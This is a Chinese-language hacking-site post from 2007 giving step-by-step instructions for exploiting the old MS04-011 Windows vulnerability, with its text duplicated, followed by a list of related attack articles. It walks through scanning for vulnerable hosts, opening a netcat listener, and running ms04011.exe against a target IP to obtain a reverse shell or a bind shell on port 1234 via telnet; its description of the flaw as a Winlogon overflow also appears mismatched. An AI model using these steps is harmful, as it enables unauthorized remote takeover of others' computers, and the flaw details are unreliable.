经典漏洞ms04011的必杀技
更新时间:2007年01月16日 00:00:00 作者:
受影响系统:
Microsoft Windows XP
Microsoft Windows NT 4.0
Microsoft Windows 2000
描述:
Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
1 用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大
2 扫到后用NC来监听 nc -l -p 监听端口 -----按回车 或 nc -vv -l -p 监听端口
3 方式 ms04011.exe 0 要入侵的IP 监听端口 自己IP
其中0 表示2000系统 NT5.0 1表示XP系统 NT5.1
或者----------------------------------------------
先ms04011.exe 0 要入侵的IP
然后直接 telnet 要入侵的IP 1234。
Microsoft Windows XP
Microsoft Windows NT 4.0
Microsoft Windows 2000
描述:
Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。
由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令。
1 用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大
2 扫到后用NC来监听 nc -l -p 监听端口 -----按回车 或 nc -vv -l -p 监听端口
3 方式 ms04011.exe 0 要入侵的IP 监听端口 自己IP
其中0 表示2000系统 NT5.0 1表示XP系统 NT5.1
或者----------------------------------------------
先ms04011.exe 0 要入侵的IP
然后直接 telnet 要入侵的IP 1234。
相关文章
这篇文章主要介绍了关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析2007-01-01
几天之内做到飞速提升排名...2007-01-01
剖析网站遭遇的黑客的三次入侵...2007-01-01
域名劫持---163.net被黑的分析...2007-01-01
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句,下面这篇文章主要给大家介绍了关于SQL注入漏洞的相关资料,需要的朋友可以参考下2022-04-04
UBB的跨站脚本攻击的漏洞...2007-01-01
利用图片做木马应用完全解析...2007-01-01
By:疯狗[B.C.T] 以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口2008-05-05
JSP中的源代码泄漏问题...2007-01-01
手机短信轰炸(图)...2007-01-01
最新评论